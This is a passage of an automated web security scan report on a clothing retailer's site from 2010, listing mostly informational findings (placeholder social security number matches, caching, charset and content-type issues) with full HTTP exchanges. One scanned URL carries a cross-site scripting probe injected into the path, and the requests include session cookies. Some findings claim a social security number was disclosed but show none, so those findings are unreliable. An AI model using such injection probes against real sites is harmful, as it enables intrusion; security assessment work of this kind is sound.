<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.80. http://www.fredperry.com/women/jackets/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /women/jackets/

Issue detail

The social security number pattern matched in the response is the placeholder 123-45-6789 in a client-side form-validation message (see the response body below), not a real social security number; the finding is a false positive.

Request

GET /women/jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:59:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1tc04bkc2hlrd4dceh3lvor110; expires=Tue, 09-Nov-2010 16:59:17 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.81. http://www.fredperry.com/women/knitwear/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /women/knitwear/

Issue detail

The social security number pattern matched in the response is the placeholder 123-45-6789 in a client-side form-validation message (see the response body below), not a real social security number; the finding is a false positive.

Request

GET /women/knitwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:58:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=qtliepkaml0tamcrk9r6572tv0; expires=Tue, 09-Nov-2010 16:58:39 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.82. http://www.fredperry.com/women/shirts/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /women/shirts/

Issue detail

The social security number pattern matched in the response is the placeholder 123-45-6789 in a client-side form-validation message (see the response body below), not a real social security number; the finding is a false positive.

Request

GET /women/shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:58:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=en3r5n3vla0t9qkn6s946k66q0; expires=Tue, 09-Nov-2010 16:58:27 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.83. http://www.fredperry.com/women/skirts/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /women/skirts/

Issue detail

The social security number pattern matched in the response is the placeholder 123-45-6789 in a client-side form-validation message (see the response body below), not a real social security number; the finding is a false positive.

Request

GET /women/skirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:00:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=37diu21bbf4t91j6m1irukgmj2; expires=Tue, 09-Nov-2010 17:00:56 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.84. http://www.fredperry.com/women/t-shirts/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /women/t-shirts/

Issue detail

The social security number pattern matched in the response is the placeholder 123-45-6789 in a client-side form-validation message (see the response body below), not a real social security number; the finding is a false positive.

Request

GET /women/t-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:02:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=r0ingtq1nnq9o6t0ej5sg1k446; expires=Tue, 09-Nov-2010 17:02:39 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> T-Shirt
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.85. http://www.fredperry.com/women/tennis/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /women/tennis/

Issue detail

The following social security number was disclosed in the response:

Request

GET /women/tennis/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:02:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=b531gmhlf84dvds064rq7h6c02; expires=Tue, 09-Nov-2010 17:02:49 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Tennis
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.86. http://www.fredperry.com/women/trousers/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /women/trousers/

Issue detail

The following social security number was disclosed in the response:

Request

GET /women/trousers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:02:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=944u4ceosrum7jtm71mur7ee34; expires=Tue, 09-Nov-2010 17:02:08 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Trouser
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.87. http://www.fredperry.com/women/woven-shirts/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /women/woven-shirts/

Issue detail

The following social security number was disclosed in the response:

Request

GET /women/woven-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:02:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=bhv7o2v67ugejb11m7s4mgb3b1; expires=Tue, 09-Nov-2010 17:02:35 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Woven S
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.88. https://www.fredperry.com/customer/account/login/

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://www.fredperry.com
Path:   /customer/account/login/

Issue detail

The following social security number was disclosed in the response:

Request

GET /customer/account/login/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:19:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=cf4fjt0aaud30ptev1ec7jdm67; expires=Tue, 09-Nov-2010 17:19:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Login-Required: true
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Custome
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.89. https://www.fredperry.com/customer8c3dc%22-alert(1)-%2276794ee1910/account/

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://www.fredperry.com
Path:   /customer8c3dc%22-alert(1)-%2276794ee1910/account/

Issue detail

The following social security number was disclosed in the response:

Request

GET /customer8c3dc%22-alert(1)-%2276794ee1910/account/ HTTP/1.1
Host: www.fredperry.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.194CKOLO; __utma=119066206.1815755339.1289339096.1289339096.1289349290.2; __utmc=119066206; __utmb=119066206.4.10.1289349290

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 18:36:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=e1t1bajii7coiqcugmfaqqj404; expires=Tue, 09-Nov-2010 19:36:18 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 29379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.90. https://www.fredperry.com/js/index.php

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://www.fredperry.com
Path:   /js/index.php

Issue detail

The following social security number was disclosed in the response:

Request

GET /js/index.php?c=auto&f=,prototype/prototype.js,prototype/validation.js,scriptaculous/builder.js,scriptaculous/effects.js,scriptaculous/dragdrop.js,scriptaculous/controls.js,scriptaculous/slider.js,varien/js.js,varien/form.js,varien/menu.js,mage/translate.js,mage/cookies.js,jquery/jquery-1.2.6.js,defacto/swfobject.js,defacto/jquery.jqzoom.js,defacto/jquery.cycle.all.pack.js,defacto/fp_general.js HTTP/1.1
Host: www.fredperry.com
Connection: keep-alive
Referer: https://www.fredperry.com/customer8c3dc%22-alert(1)-%2276794ee1910/account/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.194CKOLO; __utma=119066206.1815755339.1289339096.1289339096.1289349290.2; __utmc=119066206; __utmb=119066206.4.10.1289349290

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 18:36:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Cache-Control: must-revalidate
Last-modified: Thu, 20 May 2010 11:06:23 +0000
Expires: Wed, 09 Nov 2011 18:36:25 +0000
Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Content-Type: text/javascript
Content-Length: 399652

/* Prototype JavaScript framework, version 1.6.0.3
* (c) 2005-2008 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototype we
...[SNIP]...
something_1, block5, id-4', function (v) {
return Validation.get('IsEmpty').test(v) || /^[A-Z][A-Z0-9_\/-]*$/i.test(v)
}],
['validate-ssn', 'Please enter a valid social security number. For example 123-45-6789.', function(v) {
return Validation.get('IsEmpty').test(v) || /^\d{3}-?\d{2}-?\d{4}$/.test(v);
}],
['validate-zip', 'Please enter a valid zip code. For example 90602 or 90602-1234.', function(v) {

...[SNIP]...

10. Cacheable HTTPS response

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /skin/frontend/default/default/favicon.ico

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Request

GET /skin/frontend/default/default/favicon.ico HTTP/1.1
Host: www.fredperry.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.194CKOLO; __utma=119066206.1815755339.1289339096.1289339096.1289349290.2; __utmc=119066206; __utmb=119066206.4.10.1289349290

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 18:36:36 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 09 Mar 2009 10:57:31 GMT
ETag: "d10bc8-47e-464ad80457cc0"
Accept-Ranges: bytes
Content-Length: 1150
Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Content-Type: text/plain

............ .h.......(....... ..... ................................................................................................................PsttxvwwbjjjbkllR^^^B..............................
...[SNIP]...

11. HTML does not specify charset

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /js/index.php

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

Request

GET /js/index.php HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:13:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Content-Length: 52
Connection: close
Content-Type: text/html

SYNTAX: index.php/x.js?f=dir1/file1.js,dir2/file2.js

12. Content type incorrectly stated
There are 4 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


12.1. http://www.fredperry.com/catalogsearch/ajax/suggest/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.fredperry.com
Path:   /catalogsearch/ajax/suggest/

Issue detail

The response contains the following Content-type statement:

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /catalogsearch/ajax/suggest/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:17:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=tpk5ob8caaa346954v8rahjts0; expires=Tue, 09-Nov-2010 17:17:59 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 216850

<ul><li style="display:none"></li><li title="shirt" class="odd first"><span class="amount">119</span>shirt</li><li title="Bag" class="even"><span class="amount">40</span>Bag</li><li title="jacket" cla
...[SNIP]...

12.2. http://www.fredperry.com/js/index.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.fredperry.com
Path:   /js/index.php

Issue detail

The response contains the following Content-type statement:

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /js/index.php HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:13:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Content-Length: 52
Connection: close
Content-Type: text/html

SYNTAX: index.php/x.js?f=dir1/file1.js,dir2/file2.js

12.3. http://www.fredperry.com/skin/frontend/default/default/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/favicon.ico

Issue detail

The response contains the following Content-type statement:

